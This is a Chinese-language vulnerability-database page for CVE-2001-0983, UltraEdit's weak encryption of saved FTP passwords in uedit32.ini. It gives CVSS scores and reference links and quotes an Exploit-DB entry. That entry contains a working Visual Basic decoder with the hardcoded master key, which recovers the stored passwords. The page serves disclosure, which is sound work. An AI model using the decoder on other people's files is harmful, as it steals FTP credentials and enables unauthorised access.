CVE-2001-0983
CVSS4.6
发布时间 :2001-08-31 00:00:00
修订时间 :2016-10-17 22:14:00
NMCOE    

[原文]UltraEdit uses weak encryption to record FTP passwords in the uedit32.ini file, which allows local users who can read the file to decrypt the passwords and gain privileges.


[CNNVD]UltraEdit uedit32.ini FTP密码泄露和权限提升漏洞(CNNVD-200108-158)

        UltraEdit记录uedit32.ini文件的FTP密码时使用弱加密,能够读取文件的本地用户可以利用该漏洞译码并获取权限。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0983
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0983
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200108-158
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=99861651923668&w=2
(UNKNOWN)  BUGTRAQ  20010823 Re: Respondus v1.1.2 stores passwords using weak encryption
http://www.eve-software.com/security/ueditpw.html
(VENDOR_ADVISORY)  MISC  http://www.eve-software.com/security/ueditpw.html

- 漏洞信息

UltraEdit uedit32.ini FTP密码泄露和权限提升漏洞
中危 未知
2001-08-31 00:00:00 2005-10-20 00:00:00
本地  
        UltraEdit记录uedit32.ini文件的FTP密码时使用弱加密,能够读取文件的本地用户可以利用该漏洞译码并获取权限。

- 公告与补丁

        

- 漏洞信息 (21091)

UltraEdit 8.2 FTP Client Weak Password Encryption Vulnerability (EDBID:21091)
windows local
2001-08-23 Verified
0 E. van Elk
N/A [点击下载]
source: http://www.securityfocus.com/bid/3234/info

UltraEdit is a multi-featured commercial text editor with support for HTML, C/C++, VB, Java, Perl, XML, and C#. It also includes a hex editor and a small FTP client.

UltraEdit's FTP client has a feature which will remember FTP passwords for later use. When passwords are remembered they will be stored on the system using an "admittedly" weak encryption algorithm. As a result, it is a fairly trivial task to decrypt the passwords for FTP accounts.

Successful exploitation of this vulnerability will allow a local attacker to gain unauthorized access to the FTP sites used by other local users.

This piece of VB code will decode the passwords stored in uedit32.ini for the FTP accounts


' UltraEdit FTP password decryption (stored in uedit32.ini)
'
' Taken from the help-file:
'
' This checkbox determines if UltraEdit will save the password for later
' reference. If not the user will be prompted for the password as required. Note
' ? if the password is saved it is stored on the system. It is encrypted however
' the encryption mechanism is unsophisticated and should not be relied upon as a
' method of security.

' Masterkey. Taken from the UltraEdt.exe
Private Const Masterkey = "sdfkh we;34u[ jwef "

'Decode a single character
Public Function UEDecode(i_Asc, ByVal i_Pos As Integer)

i_Pos = i_Pos Mod 19
If i_Pos = 0 Then i_Pos = 19

UEDecode = ((Not i_Asc) And Asc(Mid(Masterkey, i_Pos, 1))) + (i_Asc And ((Not Asc(Mid(Masterkey, i_Pos, 1))) And 127))

End Function

'Decode password
Public Function UEDecodeString(str_password As String)

Dim i As Integer

UEDecodeString = ""

For i = 1 To (Len(str_password) / 2)
UEDecodeString = UEDecodeString + Chr$(UEDecode(Val("&H" + Mid(str_password, (2 * (i - 1)) + 1, 2)), i))
Next i

End Function 		

- 漏洞信息

14071
UltraEdit uedit32.ini Password Storage Encryption Weakness
Local Access Required Cryptographic
Loss of Confidentiality Solution Unknown
Exploit Public

- 漏洞描述

- 时间线

2001-08-23 Unknow
2001-08-23 Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站